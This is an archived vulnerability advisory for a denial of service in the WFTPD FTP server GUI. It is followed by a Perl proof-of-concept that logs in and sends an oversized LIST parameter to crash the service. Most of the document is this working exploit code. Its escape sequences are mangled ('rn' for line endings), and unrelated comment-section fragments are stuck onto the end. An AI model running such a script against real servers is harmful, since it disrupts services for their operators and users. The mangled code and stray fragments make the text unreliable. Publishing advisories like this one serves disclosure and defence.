source: http://www.securityfocus.com/bid/9908/info
WFTPD server front end GUI has been reported to be prone to a denial of service. The issue is reported to present itself if a user who is logged into the affected service issues an FTP request with a large parameter. This will cause the server GUI to behave in an unstable manner, potentially preventing the GUI from opening.
#!/usr/bin/perl
# Multiple Vulnerabilities in WFTPD FTP Server version 3.21.1
# Created by Beyond Security Ltd. - All rights reserved.
use IO::Socket;
$host = "192.168.1.243";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2119");
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connectedn";
while (<$remote>)
{
print $_;
if (/220 /)
{
last;
}
}
$remote->autoflush(1);
my $ftp = "USER usernamern";
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/331 /)
{
last;
}
}
$ftp = join("", "PASS ", "password", "rn");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/230 /)
{
last;
}
}
$ftp = join ("", "LIST ", "A"x260, "rn"); # DoS ...
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/250 Done/)
{
last;
}
}
close $remote;
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666